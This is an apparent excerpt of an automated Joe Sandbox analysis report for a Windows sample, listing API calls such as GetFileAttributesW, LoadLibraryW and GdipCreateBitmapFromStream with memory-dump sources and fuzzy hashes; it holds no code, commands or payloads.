                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: GdiplusShutdownUninitialize
                                                                  • String ID:
                                                                  • API String ID: 3856339756-0
                                                                  • Opcode ID: 7cffaa31815baeebb79e962551241fab096cec1fc29be16425b8406e337a43d2
                                                                  • Instruction ID: 6d1494176ea6df35260bfcd81cbcc68bf5c7ebe52ad172f64e302ff085d546dd
                                                                  • Opcode Fuzzy Hash: 7cffaa31815baeebb79e962551241fab096cec1fc29be16425b8406e337a43d2
                                                                  • Instruction Fuzzy Hash: 48E06D72604A90EFCB009B59DC46B59FBACFB88B20F14436AF416D37A0CB74A841CA94
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00CBA23A,?,00CB755C,?,?,?,?), ref: 00CBA254
                                                                    • Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CBA23A,?,00CB755C,?,?,?,?), ref: 00CBA280
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2673547680-0
                                                                  • Opcode ID: 40033b2df0ee988a43e1917140cc693c4334e814d061f7714afe1b940f77de1a
                                                                  • Instruction ID: c68468cfc0571c43c4b36b97de2d2f453a4709126dab8d60f86dd8734216dd6c
                                                                  • Opcode Fuzzy Hash: 40033b2df0ee988a43e1917140cc693c4334e814d061f7714afe1b940f77de1a
                                                                  • Instruction Fuzzy Hash: 3BE0D8325001646BCB60AB64CC09BDD7B5CAF083E2F044261FD99E71D0D770DE44DAE1
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 00CCDEEC
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 00CCDF03
                                                                    • Part of subcall function 00CCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
                                                                    • Part of subcall function 00CCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
                                                                    • Part of subcall function 00CCB568: IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
                                                                    • Part of subcall function 00CCB568: TranslateMessage.USER32(?), ref: 00CCB5AC
                                                                    • Part of subcall function 00CCB568: DispatchMessageW.USER32(?), ref: 00CCB5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                  • String ID:
                                                                  • API String ID: 2718869927-0
                                                                  • Opcode ID: 50517f7ec3ca78b6088ba79f3a2f75c082f6f050a6ee191e2c07d2f33bfe5c5b
                                                                  • Instruction ID: 63bbe6c3e23340f2b4e17120375a7c7be758453883b4a1fee265ac47f5dfd5a6
                                                                  • Opcode Fuzzy Hash: 50517f7ec3ca78b6088ba79f3a2f75c082f6f050a6ee191e2c07d2f33bfe5c5b
                                                                  • Instruction Fuzzy Hash: 25E092B250434836DF02AB64DC06FEE3BAC5B05785F040855B201DA1E3DA78EA54E662
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                  • String ID:
                                                                  • API String ID: 1175261203-0
                                                                  • Opcode ID: eac82087b11eef4bd9d18f81970c7cbecb8d9a6008a4e982addf65bd5d6babef
                                                                  • Instruction ID: ecf4976debd546a27f2066b799025335e5ff27ef5a2a34b6945d9c9e332de3db
                                                                  • Opcode Fuzzy Hash: eac82087b11eef4bd9d18f81970c7cbecb8d9a6008a4e982addf65bd5d6babef
                                                                  • Instruction Fuzzy Hash: 88E048764001586BDF11A7A4DC49FDA7BACEF093D1F040065B645D3044D674EB84DBB0
                                                                  APIs
                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CCA3DA
                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CCA3E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: BitmapCreateFromGdipStream
                                                                  • String ID:
                                                                  • API String ID: 1918208029-0
                                                                  • Opcode ID: c6d9fdbd6aebf4c853dbea6e0d0c316fb65b0c885a03ee5e49857a22ff6f28ea
                                                                  • Instruction ID: 49669687d72eecd533525fb0eaa1aaee89c1f02303ba42cc89892d7c2acb4d91
                                                                  • Opcode Fuzzy Hash: c6d9fdbd6aebf4c853dbea6e0d0c316fb65b0c885a03ee5e49857a22ff6f28ea
                                                                  • Instruction Fuzzy Hash: FEE0ED71500258EBCB10DF56C555BA9BBE8EB05364F10805EE85693211E374AE04DB91
                                                                  APIs
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CD2BAA
                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CD2BB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                  • String ID:
                                                                  • API String ID: 1660781231-0
                                                                  • Opcode ID: a81ddc9da74965a582702a71ed76306eba5fcfd50433775e9cf43367eb3000a2
                                                                  • Instruction ID: 7c0aa7fe1254a700e6158d837959c1f1af1fdf7fb1322a4b71d08f7833a92448
                                                                  • Opcode Fuzzy Hash: a81ddc9da74965a582702a71ed76306eba5fcfd50433775e9cf43367eb3000a2
                                                                  • Instruction Fuzzy Hash: E6D022342683403A4D146E703C43AB93786ADB2BB07B0179BF332897C1EED18180B032
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ItemShowWindow
                                                                  • String ID:
                                                                  • API String ID: 3351165006-0
                                                                  • Opcode ID: 5de56714893a64ec11ee96264a770d4317a3ebc4bb62dfb4adb3440b07b9b61f
                                                                  • Instruction ID: 6c2e37c1e1c19654a45d35ddee7252cd3102a6e2a20dfee048b75610b5e68a39
                                                                  • Opcode Fuzzy Hash: 5de56714893a64ec11ee96264a770d4317a3ebc4bb62dfb4adb3440b07b9b61f
                                                                  • Instruction Fuzzy Hash: 06C012B245C300BECB010BB4DC09C6BBBA8ABA5312F04C908B0A5C0260CA38C160DB21
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: def7cb17085db0a2ab7eb6848044f71844eb0099ae0dbe0df88d6d3f15b25106
                                                                  • Instruction ID: 325968992269c1ee8dec758bb86070ba58c891a44e9a23a383b0f4329cf0fb28
                                                                  • Opcode Fuzzy Hash: def7cb17085db0a2ab7eb6848044f71844eb0099ae0dbe0df88d6d3f15b25106
                                                                  • Instruction Fuzzy Hash: AAC18F70A002949FEF19CF78C8A8BF97BA5AF15310F5C01B9EC559F296DB309A44CB61
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 9977704bef73ccaac2a1a83ab3d87cde0156abbb571e3ece5207b65aa4b7d27b
                                                                  • Instruction ID: 0798ee03ae1f33e0e26ee360f113e64abd47b89b3e96ede101e3bfd23b567798
                                                                  • Opcode Fuzzy Hash: 9977704bef73ccaac2a1a83ab3d87cde0156abbb571e3ece5207b65aa4b7d27b
                                                                  • Instruction Fuzzy Hash: D771E571500BC49EDB35DB74C855AE7B7E9AF14301F40092EF6AB87241EA32BA84EF11
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB8289
                                                                    • Part of subcall function 00CB13DC: __EH_prolog.LIBCMT ref: 00CB13E1
                                                                    • Part of subcall function 00CBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CBA598
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$CloseFind
                                                                  • String ID:
                                                                  • API String ID: 2506663941-0
                                                                  • Opcode ID: beef0611e673518fa418a33d9e7a71de1e373802639134c6ceafe950124a42ff
                                                                  • Instruction ID: b5aef0a83264af817f555f376318d4a383ae71834fd25352e4160258fc521eaa
                                                                  • Opcode Fuzzy Hash: beef0611e673518fa418a33d9e7a71de1e373802639134c6ceafe950124a42ff
                                                                  • Instruction Fuzzy Hash: EC41C9719446589ADB20EB60CC65BEAB7BCAF00304F4404EAE59A97093EB745FC9DF10
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB13E1
                                                                    • Part of subcall function 00CB5E37: __EH_prolog.LIBCMT ref: 00CB5E3C
                                                                    • Part of subcall function 00CBCE40: __EH_prolog.LIBCMT ref: 00CBCE45
                                                                    • Part of subcall function 00CBB505: __EH_prolog.LIBCMT ref: 00CBB50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 39bd61525731da22bb307d776d08f5d1f1d8f495ac2261e7175bb8f4c229051d
                                                                  • Instruction ID: 73cb27a5e2f633dbb050c9372a644fc5adb88ac696c2b71b77bafe998bdde926
                                                                  • Opcode Fuzzy Hash: 39bd61525731da22bb307d776d08f5d1f1d8f495ac2261e7175bb8f4c229051d
                                                                  • Instruction Fuzzy Hash: 6D4148B0905B409EE724CF798895AE7FBE5BF29300F54492ED5FE83282CB716654DB10
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB13E1
                                                                    • Part of subcall function 00CB5E37: __EH_prolog.LIBCMT ref: 00CB5E3C
                                                                    • Part of subcall function 00CBCE40: __EH_prolog.LIBCMT ref: 00CBCE45
                                                                    • Part of subcall function 00CBB505: __EH_prolog.LIBCMT ref: 00CBB50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 926ef647a69de0bd25a44cd07d88118afd98a25e0eba43622432f5d3aae83e7a
                                                                  • Instruction ID: b3a0f5966c52f3a0b1033dd4f678712238535f86f429587aa0f225719e38a944
                                                                  • Opcode Fuzzy Hash: 926ef647a69de0bd25a44cd07d88118afd98a25e0eba43622432f5d3aae83e7a
                                                                  • Instruction Fuzzy Hash: 584157B0905B409EE724CF798895AE6FBE5FF29300F544A2ED5FE83282CB316654DB10
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 81ba367beedb430d6a93486f48ac81dbd7b8907d53882113a25d71cb9d38a279
                                                                  • Instruction ID: b3eab92ebf0d0e87b4a3ae3364223bed34f95cd73f029a656075e7895a29e824
                                                                  • Opcode Fuzzy Hash: 81ba367beedb430d6a93486f48ac81dbd7b8907d53882113a25d71cb9d38a279
                                                                  • Instruction Fuzzy Hash: 4D210FB1E40255ABDB149F75DC42F6AB6A8FB09314F04423EE616AB781D7B49A00C7A8
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CCB098
                                                                    • Part of subcall function 00CB13DC: __EH_prolog.LIBCMT ref: 00CB13E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 7c7fdcc4f84fd21cac2f7f87ad9cd4a74f412380b12844391b14b2824e996ee7
                                                                  • Instruction ID: bdeae522e344e0f2646fcbe67202585346107eaa39ca027fe51400b97bde10f7
                                                                  • Opcode Fuzzy Hash: 7c7fdcc4f84fd21cac2f7f87ad9cd4a74f412380b12844391b14b2824e996ee7
                                                                  • Instruction Fuzzy Hash: E4317C75C102499ECF15DFA9C861AEEBBB4AF09300F5844AEE809B7242D735AF04DB61
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00CDACF8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID:
                                                                  • API String ID: 190572456-0
                                                                  • Opcode ID: 62b615e07a669777ec5c09f0357d0bd1e25bf7d55c6f024eb929552450d67a3f
                                                                  • Instruction ID: f6944e040a49ef0c3eb7b80b51d9c25b3358723e1c82d4c968cc05956d8ecfc1
                                                                  • Opcode Fuzzy Hash: 62b615e07a669777ec5c09f0357d0bd1e25bf7d55c6f024eb929552450d67a3f
                                                                  • Instruction Fuzzy Hash: 8C11CA33A116356F9F219E1DDC80A5A7396ABC43707164222FE25EF354D731DD0187D2
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 00CCF312
                                                                    • Part of subcall function 00CCFAEC: InitializeSListHead.KERNEL32(00D11D30,00CCF337), ref: 00CCFAF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize$HeadList
                                                                  • String ID:
                                                                  • API String ID: 394358367-0
                                                                  • Opcode ID: f84c76eb05017edceff79c9ca93bb93d08ae5b4c31b7b96ab789fae631288a15
                                                                  • Instruction ID: 2b14dcafc19c1c3088465e72f51cd0f297f7355d1df73e446ae79f6da669878d
                                                                  • Opcode Fuzzy Hash: f84c76eb05017edceff79c9ca93bb93d08ae5b4c31b7b96ab789fae631288a15
                                                                  • Instruction Fuzzy Hash: 3C01A45454020175DD2033F1C837F5E524B4F01794F28083FFA989A2A3EE2AC90BB073
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 64721933665a02641f10ff210759fa49d728ad8cfa7f9796e3ce0d05ec2895b3
                                                                  • Instruction ID: b7b38473d302a119f7cd3e71cb2b5d11e3cbe423f69a650bc46d2b496bc54807
                                                                  • Opcode Fuzzy Hash: 64721933665a02641f10ff210759fa49d728ad8cfa7f9796e3ce0d05ec2895b3
                                                                  • Instruction Fuzzy Hash: 0901C433D00528ABCF22ABA8CC91ADEB775FF88750F014125FD16B7262DA34CE04D6A1
                                                                  APIs
